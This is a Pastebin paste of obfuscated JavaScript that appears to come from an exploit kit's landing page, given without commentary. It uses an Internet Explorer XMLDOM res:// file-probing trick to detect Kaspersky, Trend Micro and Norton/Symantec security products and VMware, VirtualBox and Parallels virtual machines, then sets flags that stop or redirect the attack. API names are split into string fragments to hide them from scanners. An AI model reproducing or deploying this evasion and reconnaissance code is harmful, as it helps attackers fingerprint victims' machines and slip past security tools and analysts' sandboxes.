Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function gs7sfd(txt) {
- var v1 = 'XM' + 'LD' + 'OM',
- v2 = 'pa' + 'rseE' + 'rr' + 'or',
- v3 = 'loa' + 'dX' + 'ML',
- v4 = 'DT' + 'D X' + 'HTML 1.0 Transitional',
- v5 = 'err' + 'orC' + 'ode';
- var resInf = new ActiveXObject("Microsoft." + v1),
- subpath = "c:\\Windows\\System32\\drivers\\" + txt + ".sys";
- resInf.async = true;
- resInf[v3]('<!DOCTYPE html PUBLIC "-//W3C//' + v4 + '//EN" "res://' + subpath + '">');
- if (resInf[v2][v5] != 0) {
- var pe = resInf[v2],
- err = "Error Code: " + pe[v5] + "\n";
- err += "Error Reason: " + pe.reason;
- err += "Error Line: " + pe.line;
- if (err.indexOf("-2147023083") > 0) {
- return 1;
- } else {
- return 0;
- }
- }
- return 0;
- }
- var tmp;
- try {
- tmp = new ActiveXObject('Kaspersky.IeVirtualKeyboardPlugin.JavascriptApi.1');
- } catch (e) {
- tmp = false;
- }
- if (tmp || gs7sfd("kl1") || gs7sfd("tmactmon") || gs7sfd("tmcomm") || gs7sfd("tmevtmgr") || gs7sfd("TMEBC32") || gs7sfd("tmeext") || gs7sfd("tmnciesc") || gs7sfd("tmtdi") || gs7sfd("vm3dmp") || gs7sfd("vmusbmouse") || gs7sfd("vmmouse") || gs7sfd("vmhgfs") || gs7sfd("VBoxGuest") || gs7sfd("VBoxMouse") || gs7sfd("VBoxSF") || gs7sfd("VBoxVideo") || gs7sfd("prl_boot") || gs7sfd("prl_fs") || gs7sfd("prl_kmdd") || gs7sfd("prl_memdev") || gs7sfd("prl_mouf") || gs7sfd("prl_pv32") || gs7sfd("prl_sound") || gs7sfd("prl_strg") || gs7sfd("prl_tg") || gs7sfd("prl_time")) {
- Target();
- } else {
- function Check(s) {
- x = new Image();
- x.onload = Target;
- x.src = s;
- return 0;
- }
- var kv1 = "res://C:\\Program Files",
- kv2 = "\\Kaspersky Lab\\Kaspersky ",
- kv3 = "Anti-Virus ",
- kv4 = "Internet Security ",
- kv5 = "\\shellex.dll/#2/#102",
- kv6 = "\\mfc42.dll/#2/#26567",
- pathdata = [kv1 + kv2 + kv3 + '5.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0' + kv5, kv1 + kv2 + kv3 + '7.0' + kv5, kv1 + kv2 + kv3 + '2009' + kv6, kv1 + kv2 + kv3 + '2010' + kv6, kv1 + kv2 + kv3 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv3 + '2012\\x86' + kv6, kv1 + kv2 + kv3 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '6.0' + kv5, kv1 + kv2 + kv4 + '7.0' + kv5, kv1 + kv2 + kv4 + '2009' + kv6, kv1 + kv2 + kv4 + '2010' + kv6, kv1 + kv2 + kv4 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv4 + '2012\\x86' + kv6, kv1 + kv2 + kv4 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '14.0.0\\x86' + kv6, kv1 + kv2 + kv4 + '15.0.0\\x86' + kv6, kv1 + kv2 + 'PURE' + kv6, kv1 + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + kv2 + 'PURE 3.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv3 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv4 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 3.0\\x86' + kv6, 'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567', 'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996', 'res://C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110', 'res://C:\\Program Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204'];
- [-----]
- function gs7sfd(txt) {
- var v1 = 'XM' + 'LD' + 'OM',
- v2 = 'pa' + 'rseE' + 'rr' + 'or',
- v3 = 'loa' + 'dX' + 'ML',
- v4 = 'DT' + 'D X' + 'HTML 1.0 Transitional',
- v5 = 'err' + 'orC' + 'ode';
- var resInf = new ActiveXObject("Microsoft." + v1),
- subpath = "c:\\Windows\\System32\\drivers\\" + txt + ".sys";
- resInf.async = true;
- resInf[v3]('<!DOCTYPE html PUBLIC "-//W3C//' + v4 + '//EN" "res://' + subpath + '">');
- if (resInf[v2][v5] != 0) {
- var pe = resInf[v2],
- err = "Error Code: " + pe[v5] + "\n";
- err += "Error Reason: " + pe.reason;
- err += "Error Line: " + pe.line;
- if (err.indexOf("-2147023083") > 0) {
- return 1;
- } else {
- return 0;
- }
- }
- return 0;
- }
- var stopFlag;
- if (gs7sfd("SYMEVENT")) {
- stopFlag = true;
- } else {
- try {
- var stopFlag = new ActiveXObject("Symantec.IPS.WebProtection.1");
- } catch (e) {
- stopFlag = false;
- }
- if (!stopFlag) {
- function Target() {
- stopFlag = true;
- }
- function Check(s) {
- x = new Image();
- x.onload = Target;
- x.src = s;
- return 0;
- }
- pathdata = ["res://C:\\Program Files\\Norton Internet Security\\Engine\\21.1.0.18\\asOEHook.dll/#2/#102", "res://C:\\Program Files\\Norton Internet Security\\Engine\\21.6.0.32\\asOEHook.dll/#2/#102"];
- for (var i = 0; i < pathdata.length; ++i) Check(pathdata[i]);
- function pauseIt(millis) {
- var date = new Date();
- var curDate = null;
- do {
- curDate = new Date();
- } while (curDate - date < millis);
- }
- pauseIt(1000);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement